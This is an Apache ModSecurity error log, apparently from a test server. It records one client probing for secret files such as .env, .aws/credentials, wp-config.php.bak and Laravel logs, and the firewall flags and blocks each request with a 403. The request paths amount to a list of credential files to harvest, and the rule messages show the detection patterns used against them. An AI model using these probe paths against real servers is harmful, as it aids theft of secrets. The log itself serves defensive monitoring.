[Thu Dec 18 01:52:26.646035 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE-QAAAAY"]
[Thu Dec 18 01:52:26.686812 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE-gAAAAY"]
[Thu Dec 18 01:52:26.686976 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE-gAAAAY"]
[Thu Dec 18 01:52:26.687116 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE-gAAAAY"]
[Thu Dec 18 01:52:26.733177 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE-wAAAAY"]
[Thu Dec 18 01:52:26.733376 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE-wAAAAY"]
[Thu Dec 18 01:52:26.733548 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE-wAAAAY"]
[Thu Dec 18 01:52:26.773094 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE_AAAAAY"]
[Thu Dec 18 01:52:26.773270 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE_AAAAAY"]
[Thu Dec 18 01:52:26.773425 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE_AAAAAY"]
[Thu Dec 18 01:52:26.817329 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE_QAAAAY"]
[Thu Dec 18 01:52:26.817498 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE_QAAAAY"]
[Thu Dec 18 01:52:26.817660 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE_QAAAAY"]
[Thu Dec 18 01:52:26.860097 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE_gAAAAY"]
[Thu Dec 18 01:52:26.860281 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE_gAAAAY"]
[Thu Dec 18 01:52:26.860489 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE_gAAAAY"]
[Thu Dec 18 01:52:26.900922 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aUNQSoUzQOIP6NNaX_tE_wAAAAY"]
[Thu Dec 18 01:52:26.901123 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aUNQSoUzQOIP6NNaX_tE_wAAAAY"]
[Thu Dec 18 01:52:26.901285 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aUNQSoUzQOIP6NNaX_tE_wAAAAY"]
[Thu Dec 18 01:52:26.935141 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aUNQSoUzQOIP6NNaX_tFAAAAAAY"]
[Thu Dec 18 01:52:26.935256 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aUNQSoUzQOIP6NNaX_tFAAAAAAY"]
[Thu Dec 18 01:52:26.935418 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aUNQSoUzQOIP6NNaX_tFAAAAAAY"]
[Thu Dec 18 01:52:26.935563 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aUNQSoUzQOIP6NNaX_tFAAAAAAY"]
[Thu Dec 18 01:52:32.724753 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aUNQUIUzQOIP6NNaX_tFGgAAAAY"]
[Thu Dec 18 01:52:32.725005 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aUNQUIUzQOIP6NNaX_tFGgAAAAY"]
[Thu Dec 18 01:52:32.725166 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aUNQUIUzQOIP6NNaX_tFGgAAAAY"]
[Thu Dec 18 01:52:36.872866 2025] [authz_core:error] [pid 812046] [client 45.148.10.143:48756] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Thu Dec 18 01:52:36.907365 2025] [:error] [pid 812046] [client 45.148.10.143:48756] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aUNQVMStBbWynvk_-P7rhwAAAAo"]
[Thu Dec 18 01:52:36.907576 2025] [:error] [pid 812046] [client 45.148.10.143:48756] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aUNQVMStBbWynvk_-P7rhwAAAAo"]
[Thu Dec 18 01:52:36.907753 2025] [:error] [pid 812046] [client 45.148.10.143:48756] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aUNQVMStBbWynvk_-P7rhwAAAAo"]
[Thu Dec 18 01:52:37.192690 2025] [:error] [pid 810595] [client 45.148.10.143:48762] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /api/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aUNQVYVQR0ZCxazVD9krzQAAAAM"]
[Thu Dec 18 01:52:37.192879 2025] [:error] [pid 810595] [client 45.148.10.143:48762] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aUNQVYVQR0ZCxazVD9krzQAAAAM"]
[Thu Dec 18 01:52:37.193033 2025] [:error] [pid 810595] [client 45.148.10.143:48762] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aUNQVYVQR0ZCxazVD9krzQAAAAM"]
[Thu Dec 18 01:52:37.268796 2025] [:error] [pid 810595] [client 45.148.10.143:48762] [client 45.148.10.143] ModSecurity: Warning. Matched phrase ".travis.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .travis.yml found within REQUEST_FILENAME: /.travis.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aUNQVYVQR0ZCxazVD9kr0AAAAAM"]
[Thu Dec 18 01:52:37.268954 2025] [:error] [pid 810595] [client 45.148.10.143:48762] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aUNQVYVQR0ZCxazVD9kr0AAAAAM"]
[Thu Dec 18 01:52:37.269126 2025] [:error] [pid 810595] [client 45.148.10.143:48762] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aUNQVYVQR0ZCxazVD9kr0AAAAAM"]
[Thu Dec 18 01:52:37.575916 2025] [:error] [pid 810595] [client 45.148.10.143:48762] [client 45.148.10.143] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aUNQVYVQR0ZCxazVD9kr2gAAAAM"]
[Thu Dec 18 01:52:37.576089 2025] [:error] [pid 810595] [client 45.148.10.143:48762] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aUNQVYVQR0ZCxazVD9kr2gAAAAM"]
[Thu Dec 18 01:52:37.576252 2025] [:error] [pid 810595] [client 45.148.10.143:48762] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aUNQVYVQR0ZCxazVD9kr2gAAAAM"]
[Thu Dec 18 07:23:33.976639 2025] [authz_core:error] [pid 813018] [client 146.190.103.103:57310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
